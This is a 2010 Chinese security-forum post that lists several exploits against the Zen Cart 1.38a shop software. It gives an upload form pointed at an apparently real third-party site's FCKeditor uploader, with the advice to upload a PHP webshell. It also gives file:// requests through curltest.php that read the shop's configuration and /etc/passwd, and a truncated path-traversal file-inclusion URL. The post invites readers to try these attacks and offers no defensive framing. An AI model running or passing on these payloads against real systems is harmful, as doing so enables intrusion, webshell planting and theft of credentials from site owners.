标题:
zen cart 1.38a多处漏洞分析
[打印本页]
作者:
晓谛
时间:
2010-11-6 18:30
标题:
zen cart 1.38a多处漏洞分析
zen cart 1.38a多处漏洞分析
发布日期:2010-10.27
发布作者:佚名
影响版本:zen cart 1.38a
漏洞类型:文件上传、文件包含、代码执行
漏洞描述:
漏洞1、
<form id="frmUpload" enctype="multipart/form-data" action="http://aus-snowboots.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
大家试下威力。
直接上传PHP WEBSHELL 到IMAGES
漏洞2
Zen Cart 本地文件泄露
得到网页所在路径
/extras/ipn_test_return.php
得到网站配置信息
/extras/curltest.php?url=file:///网站地址/includes/configure.php
读取linux服务器passwd
/extras/curltest.php?url=file:///etc/passwd
漏洞3
Zen Cart v1.3.9f (typefilter) 本地文件包含漏洞
EXP:
http://127.0.0.1/index.php?typef ... %2F..%2Fboot.ini%00
直接给出EXP 很早的 依然很强大。。。。。。
漏洞4、远程代码执行
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)
Powered by Discuz! 7.2